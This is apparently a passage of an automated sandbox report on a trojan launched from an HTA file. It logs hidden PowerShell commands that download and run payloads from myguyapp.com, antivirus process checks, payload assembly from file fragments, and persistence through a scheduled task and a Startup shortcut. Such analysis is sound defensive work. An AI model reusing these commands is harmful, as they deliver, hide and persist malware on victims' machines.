    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C91D20
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C91FE7
    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: String function: 004062A3 appears 58 times
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: String function: 00C8FD52 appears 40 times
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: String function: 00C90DA0 appears 46 times
    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
    Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winHTA@72/99@9/3
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CE41FA GetLastError,FormatMessageW
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CD2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CD1A0B AdjustTokenPrivileges,CloseHandle
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CDDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_004024FB CoCreateInstance
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CE3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
    Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0o8vth[1].bat
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8760:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8920:120:WilError_03
    Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Temp\temp.bat
    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
    Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2044 --field-trial-handle=1728,i,16385498434607258670,18278990784431365219,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2044 --field-trial-handle=1728,i,16385498434607258670,18278990784431365219,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msxml6.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: schannel.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msdart.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: policymanager.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msvcp110_win.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: pcacli.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
